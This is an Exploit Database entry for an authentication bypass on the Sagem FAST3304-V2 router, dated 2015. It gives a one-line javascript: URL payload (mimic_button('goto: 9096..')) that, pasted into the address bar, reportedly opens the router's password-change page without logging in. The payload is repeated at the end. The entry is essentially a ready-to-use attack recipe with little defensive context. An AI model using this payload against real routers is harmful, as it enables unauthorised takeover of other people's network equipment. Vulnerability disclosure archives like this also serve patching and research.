Sagem FAST3304-V2 - Authentication Bypass (2)

EDB-ID:

38553

CVE:





Platform:

Hardware

Date:

2015-10-28


================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____ 
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/ 
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \ 
                                                      
================================================================================


######################################################
# Exploit Title: Sagem javascript injection 
# Date: 27/10/15
# Exploit Author: Soufiane Alami Hassani
# Version: FAST3304-V2
# Tested on: [Windows 8.1 Pro]
# Category : webapps
# Facebook : soufiane.a.hassani
# Email    : nios1515@gmail.com
######################################################


###########################
#By Soufiane Alami Hassani#
###########################

Vulnerability Description : You can change the password of your router even if you have not the access.

Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password .

########################
Moroccan Are The Best .
########################


mimic_button('goto: 9096..')